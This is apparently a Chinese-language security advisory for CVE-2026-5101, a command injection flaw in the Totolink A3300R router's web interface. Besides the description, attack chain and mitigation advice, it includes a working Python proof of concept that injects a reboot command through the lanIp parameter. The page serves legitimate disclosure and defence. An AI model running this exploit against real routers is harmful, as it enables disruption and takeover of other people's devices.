IPBUF安全漏洞报告
English
CVE-2026-5101 CVSS 6.3 中危

CVE-2026-5101 Totolink A3300R命令注入漏洞

披露日期: 2026-03-29

漏洞信息

漏洞编号
CVE-2026-5101
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink A3300R

相关标签

命令注入RCETotolink路由器IoT安全

漏洞概述

Totolink A3300R路由器存在命令注入漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中的setLanCfg函数未正确过滤用户输入。攻击者可通过操纵lanIp参数注入恶意命令。由于攻击无需用户交互且仅需低权限,远程攻击者可利用此漏洞在目标系统上执行任意系统命令,可能导致设备被完全控制或敏感信息泄露。

技术细节

该漏洞位于Totolink A3300R路由器的Web管理接口中,具体受影响的组件为/cgi-bin/cstecgi.cgi脚本下的setLanCfg功能模块。在处理LAN配置请求时,程序未能对传入的`lanIp`参数进行严格的边界检查和特殊字符过滤。当攻击者向目标设备发送特制的HTTP POST请求,并在`lanIp`参数中拼接shell元字符(如分号、反引号或管道符)时,后端程序会将该参数直接拼接到系统命令中执行。由于CVSS向量显示攻击无需用户交互(UI:N)且权限要求较低(PR:L),攻击者可利用此漏洞在底层操作系统上下文中执行任意命令,进而获取设备控制权、窃取敏感信息或造成拒绝服务。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别出存在漏洞的Totolink A3300R设备及其固件版本。
STEP 2
漏洞利用
攻击者构造包含恶意代码的HTTP POST请求,发送至/cgi-bin/cstecgi.cgi,利用setLanCfg函数中的lanIp参数进行命令注入。
STEP 3
命令执行
服务器端未过滤参数,直接执行注入的系统命令(如反弹Shell或下载恶意程序)。
STEP 4
权限提升与控制
攻击者获得设备控制权,可进一步修改配置、窃取数据或作为跳板攻击内网。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_ip): url = f"http://{target_ip}/cgi-bin/cstecgi.cgi" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/json" } # Payload: Injecting a command to reboot the device or create a backdoor # Changing the lanIp to a valid IP followed by a command injection separator data = { "function": "setLanCfg", "lanIp": "192.168.0.1;reboot;" } try: response = requests.post(url, json=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Payload sent successfully. Check if command executed.") else: print(f"[-] Failed to send payload. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "192.168.0.1" # Replace with target IP exploit(target)

影响范围

Totolink A3300R 17.0.0cu.557_b20221024

防御指南

临时缓解措施
在未升级固件前,建议将路由器管理界面设置为仅内网访问,并关闭远程管理功能。同时,通过ACL(访问控制列表)严格限制对/cgi-bin/cstecgi.cgi路径的访问请求,以降低被攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表